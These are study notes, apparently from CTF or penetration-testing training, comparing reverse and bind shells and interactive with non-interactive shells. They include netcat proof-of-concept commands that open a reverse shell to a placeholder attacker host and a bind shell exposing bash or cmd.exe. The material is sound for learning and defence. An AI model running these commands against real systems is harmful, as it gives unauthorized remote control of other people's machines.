Shells (Reverse vs Bind)

High-level

Two main shell types used when exploiting a target:
- Reverse shells: target connects back to attacker.
- Bind shells: target opens a listener; attacker connects to target.

Definition: code executed on target initiates a connection to the attacker's machine (attacker listens).
Pros:
- Good for bypassing firewall rules that prevent inbound connections to the target.
- Easier to execute and debug in CTF scenarios
Cons:
- Requires attacker to configure their own network to accept incoming connections when across the internet.
Typical (PoC) example:
- Attacker (listen):
```
sudo nc -lvnp 443
```
- Target (connect back):
```
nc <LOCAL-IP> <PORT> -e /bin/bash
```
- After connection: you execute commands as the remote user (e.g., whoami).

Definition: code on target starts a listener attached to a shell; attacker connects to the opened port on target.
Pros:
- No configuration required on attacker network.
Cons:
- May be prevented by target-side firewalls (incoming connections to opened port).
- Less common than reverse shells but still useful.
Typical (PoC) example (Windows shown, but not limited to Windows):
- Target (start listener + execute shell):
```
nc -lvnp <port> -e "cmd.exe"
```
- Attacker (connect):
```
nc MACHINE_IP <port>
```
- Grants remote code execution on the target.

Interactive shells
- Behave like usual shells (bash, zsh, PowerShell).
- Allow interactive programs (prompts, menus, password input).
- Example: SSH login prompt requires interactivity (asks yes/no, password, etc.).
Non-interactive shells
- Do not support interactive input/output properly.
- Limitations: many simple reverse/bind shells are non-interactive.
- Non-interactive example behavior:
  - whoami (non-interactive) works fine.
  - ssh (interactive) produces no usable output in a non-interactive shell.
- Consequence: interactive programs often fail or their output is not usable; additional techniques required to get a fully interactive TTY.